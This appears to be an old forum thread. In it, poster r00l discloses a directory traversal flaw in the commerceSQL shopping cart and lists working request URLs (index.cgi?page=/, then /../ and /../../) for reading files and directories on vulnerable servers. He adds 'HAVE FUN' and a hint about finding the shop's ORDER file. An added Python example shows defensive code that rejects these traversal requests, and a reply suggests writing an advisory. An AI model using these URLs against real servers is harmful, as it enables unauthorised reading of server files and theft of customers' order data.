r00l
HI!
One week ago I found a vulnerability in the commerce sql shopping cart.
You can use it for reading directories and files. The problem is that the admin of the vulnerable server MUST set a permission on the directories and files, but he did not.
Sooo...the example looks like this:

www.server.com/cgi-bin/commerceSQL/index.cgi?page=/

If the server is vulnerable it will give you the file of the directory where the shopping cart is.

The next thing you should do is probably this:

www.server.com/cgi-bin/commerceSQL/index.cgi?page=/../

and then

www.server.com/cgi-bin/commerceSQL/index.cgi?page=/../../

etc...

You can reach a lot of files.

HAVE FUN!

P.S.
Don't ask where the ORDER file is. I won't tell you! But if you find it yourself I don't care.

-= Founded by r00l =-
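
An added example, not part of the post above and not the shopping cart's own code: one way a request handler can confine an untrusted `page` value to a single directory, so that the `page=/` and `page=/../` requests shown in the post are rejected instead of returning a listing or a file outside that directory. The names `resolve_page`, `PageRejected` and `base_dir` are assumptions made for this illustration.

```python
import os
import tempfile


class PageRejected(Exception):
    """Raised when a requested page is not a regular file inside base_dir."""


def resolve_page(base_dir: str, page: str) -> str:
    """Map an untrusted `page` value to a regular file under base_dir, or raise."""
    if not page or "\x00" in page:
        raise PageRejected("empty value or NUL byte")
    base = os.path.realpath(base_dir)
    # Strip leading separators so "/" and "/../" are resolved relative to base
    # instead of being treated as absolute filesystem paths.
    candidate = os.path.realpath(os.path.join(base, page.lstrip("/\\")))
    # realpath() collapses ".." and follows symlinks; the result must still
    # be located under base after that normalisation.
    if os.path.commonpath([base, candidate]) != base:
        raise PageRejected("path escapes base directory")
    # Never hand back a directory (no listings); only regular files are pages.
    if not os.path.isfile(candidate):
        raise PageRejected("not a regular file")
    return candidate


if __name__ == "__main__":
    # Constructed sample layout: one legitimate page inside a temporary directory.
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "pages")
        os.mkdir(base)
        with open(os.path.join(base, "home.html"), "w") as fh:
            fh.write("welcome")
        for page in ["home.html", "/", "/../", "/../../"]:
            try:
                print(repr(page), "->", resolve_page(base, page))
            except PageRejected as exc:
                print(repr(page), "-> rejected:", exc)
```

File-system permissions on the server remain a second layer: the web server account should only be able to read the directory passed as `base_dir`.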
woutiir
Nicely done mate, maybe you can write an advisory about it.

Thnx for sharing!

gr.
woutiir